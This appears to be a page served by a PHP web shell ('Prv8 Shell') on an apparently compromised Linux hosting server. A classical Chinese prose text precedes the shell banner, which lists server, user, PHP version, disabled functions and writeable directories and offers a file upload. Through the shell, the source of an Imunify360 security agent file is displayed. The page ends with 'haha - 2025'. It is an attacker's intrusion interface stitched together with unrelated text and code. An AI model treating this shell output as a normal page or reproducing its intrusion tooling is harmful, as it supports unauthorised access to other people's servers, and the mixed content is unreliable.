晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/internals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //opt/imunify360/venv/lib64/python3.11/site-packages/defence360agent/internals/the_sink.py
import asyncio
import collections
import io
import reprlib
import time
import weakref
import logging
from contextlib import suppress

from operator import attrgetter

from defence360agent.contracts.messages import Message, Reject
from defence360agent.contracts.plugins import BaseMessageProcessor
from defence360agent.utils.common import DAY, ServiceBase, rate_limit
from defence360agent.internals.global_scope import g

logger = logging.getLogger(__name__)

ProcessingMessage = collections.namedtuple(
    "ProcessingMessage", ["message", "start_time"]
)


class TheSink(BaseMessageProcessor):
    def __init__(self, sink_list, loop):
        self._sinks_ordered = sorted(
            sink_list, key=attrgetter("PROCESSING_ORDER")
        )
        self._loop = loop
        self._task_manager = TaskManager(
            loop, MessageProcessor(self._sinks_ordered)
        )
        g.sink = self

    def __repr__(self):
        return "%s.%s" % (self.__class__.__module__, self.__class__.__name__)

    def decompose(self, classobj):
        """
        introspection: decompose a specific role
        :return classobj: instance or None
        """
        options = [
            sink for sink in self._sinks_ordered if isinstance(sink, classobj)
        ]
        assert len(options) <= 1, "Ambiguous request"
        return next(iter(options), None)

    def start(self):
        """
        Make sure to run message processing bus only
        when every MessageSource (or MessageSource+MessageSink mix)
        got initialized
        """
        self._task_manager.start()

    async def shutdown(self):
        self._task_manager.should_stop()

        await self._task_manager.wait_current_tasks(timeout=5)
        await self._task_manager.wait()

    async def process_message(self, message):
        await self._task_manager.push_msg(message)


class TaskManager(ServiceBase):
    # max queue message size
    MAXSIZE = 100000
    # number of concurrently processed messages
    CONCURRENCY = 5
    # how long an individual message may be processed
    TIMEOUT = 3600  # seconds

    def __init__(self, loop, msg_processor):
        super().__init__(loop)
        self._queue = MessageQueue(maxsize=self.MAXSIZE)
        self._concurrency = self.CONCURRENCY
        self._process_message_timeout = self.TIMEOUT
        self._msg_processor = msg_processor
        self.tasks = weakref.WeakSet()
        self._throttled_logger = rate_limit(period=DAY, on_drop=logger.warning)
        self.throttled_log_error = self._throttled_logger(logger.error)

    async def push_msg(self, msg):
        """Push message unless the queue is full."""
        if not self._queue.full():
            await self._queue.put(MessageComparable(msg))
        else:
            if self._throttled_logger.should_be_called:  # send to Sentry
                args = (
                    (
                        "Message queue is full %s. "
                        "Current processing messages: %s. Message ignored: %s"
                    ),
                    self._queue,
                    self.current_processing_messages,
                    msg,
                )
            else:  # don't serialize the queue on each log warning entry
                args = (
                    (
                        "Message queue is full. Queue size: %s "
                        "Current processing messages: %s. Message ignored: %s"
                    ),
                    self._queue.qsize(),
                    self.current_processing_messages,
                    msg,
                )
            self.throttled_log_error(*args)

    @property
    def current_processing_messages(self):
        # the loop should be safe (no ref should be removed from the weak
        # set while iterating)
        # https://stackoverflow.com/questions/12428026/safely-iterating-over-weakkeydictionary-and-weakvaluedictionary  # noqa
        # the loop is constant time because
        # len(self.tasks) == self._concurrency (fixed & small)
        return tuple(
            (
                task.processing_msg.message,
                round(time.monotonic() - task.processing_msg.start_time, 4),
            )
            for task in self.tasks
            if not task.done()
        )

    async def wait_current_tasks(self, timeout=None):
        if self.tasks:
            await asyncio.wait(self.tasks, timeout=timeout)

    async def _run(self):
        semaphore = asyncio.BoundedSemaphore(self._concurrency)
        try:
            while not self._should_stop:
                logger.debug("Message queue size: %s", self._queue.qsize())
                try:
                    await self.__limit_concurrency(semaphore)
                    msg_comparable = await self._queue.get()
                except asyncio.CancelledError:
                    break
                t = self._loop.create_task(
                    self._msg_processor(msg_comparable.msg)
                )  # type: asyncio.Task
                t.processing_msg = ProcessingMessage(
                    msg_comparable.msg, time.monotonic()
                )
                t.add_done_callback(lambda _: semaphore.release())
                t.add_done_callback(self._on_msg_processed)
                self.tasks.add(t)
            unprocessed = self._queue.qsize()
            if unprocessed:
                logger.warning(
                    "There is still %s unprocessed messages in the queue",
                    self._queue.qsize(),
                )
        except:  # NOQA
            logger.exception("Error during message processing:")

    async def __limit_concurrency(self, semaphore):
        """Try to acquire *semaphore* in a loop, log error on timeout."""
        while True:
            try:
                return await asyncio.wait_for(
                    semaphore.acquire(),
                    timeout=self._process_message_timeout,
                )
            except asyncio.TimeoutError:
                self.throttled_log_error(
                    "Message hasn't been processed in %s seconds",
                    self._process_message_timeout,
                )

    @staticmethod
    def _on_msg_processed(future):
        e = future.exception()
        if e:
            logger.exception("Error during message processing:", exc_info=e)


async def cancel_task(task):
    if not task.done():
        task.cancel()
        with suppress(asyncio.CancelledError):
            await task


class MessageProcessor(object):
    TIMEOUT_TO_SINK_PROCESS = 3600

    def __init__(self, sinks):
        self.sinks = sinks
        self.locks = weakref.WeakValueDictionary()
        self.throttled_log_error = rate_limit(period=60 * 60)(
            logger.error
        )  # send event to Sentry once an hour

    async def __call__(self, msg):
        ip = msg.get("attackers_ip")
        if ip:
            lock = self.locks.setdefault(ip, asyncio.Lock())
            async with lock:
                await self._call_unlocked(msg)
        else:
            await self._call_unlocked(msg)

    async def _call_unlocked(self, msg):
        start = time.monotonic()
        for sink in self.sinks:
            try:
                process_message_task = asyncio.create_task(
                    sink.process_message(msg)
                )
                processed = await asyncio.wait_for(
                    # shielded only for debug DEF-18627,
                    # it should intercept `CancelledError` that
                    # `asyncio.wait_for` send to `process_message_task`
                    # in case timeout
                    asyncio.shield(process_message_task),
                    timeout=self.TIMEOUT_TO_SINK_PROCESS,
                )
            except asyncio.CancelledError:
                break
            except Reject as e:
                logger.info("Rejected: %s -> %r", str(e), msg)
                return
            except asyncio.TimeoutError:
                # debug for DEF-18627, it's supposed that during this exception
                # handling we will get call stack in logs and see last await
                # that hang out coroutine was made,
                # may be it's give us some hint about problem
                stack = io.StringIO()
                process_message_task.print_stack(file=stack)
                stack.seek(0)
                logger.error(
                    "Message %r was not processed in the %r plugin in %ss; "
                    "Traceback: %s",
                    msg,
                    sink,
                    self.TIMEOUT_TO_SINK_PROCESS,
                    stack.read(),
                )
                return
            except Exception:
                logger.exception("Error processing %r in %r", msg, sink)
                return
            else:
                if isinstance(processed, Message):
                    msg = processed
            finally:
                await cancel_task(process_message_task)
        processing_time = time.monotonic() - start
        logger.info("%s processed in %.4f seconds", msg, processing_time)
        if processing_time > msg.PROCESSING_TIME_THRESHOLD:
            # send to Sentry
            self.throttled_log_error(
                "%s message took longer to process than expected "
                "(%.4f sec > %.4f sec)",
                msg,
                processing_time,
                msg.PROCESSING_TIME_THRESHOLD,
            )


class MessageComparable(object):
    """Wrapper to make message comparable."""

    # needed to keep order
    index = -1

    @staticmethod
    def __new__(cls, msg):
        cls.index += 1
        rv = super().__new__(cls)
        rv.priority = msg.PRIORITY, cls.index
        rv.msg = msg
        return rv

    def __lt__(self, other):
        return self.priority.__lt__(other.priority)

    def __repr__(self):
        return "<{klass}({msg!r}), priority={priority}>".format(
            klass=self.__class__.__name__,
            msg=self.msg,
            priority=self.priority,
        )


class MessageQueue(asyncio.PriorityQueue):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._repr = reprlib.Repr()
        self._repr.maxstring = 50
        self._repr.maxtuple = 2000

    async def put(self, item: MessageComparable):
        return await super().put(item)

    def __str__(self):
        # NOTE: do not flood console.log with full queue
        msg_counts = sorted(
            collections.Counter(
                [item.msg.__class__.__qualname__ for item in self._queue]
            ).items(),
            key=lambda item: item[1],  # sorted by number of messages
            reverse=True,
        )
        return (
            f"<PriorityQueue maxsize={self.maxsize}; "
            f"queue_size={self.qsize()} "
            f"queue_counter={self._repr.repr(msg_counts)}>"
        )

haha - 2025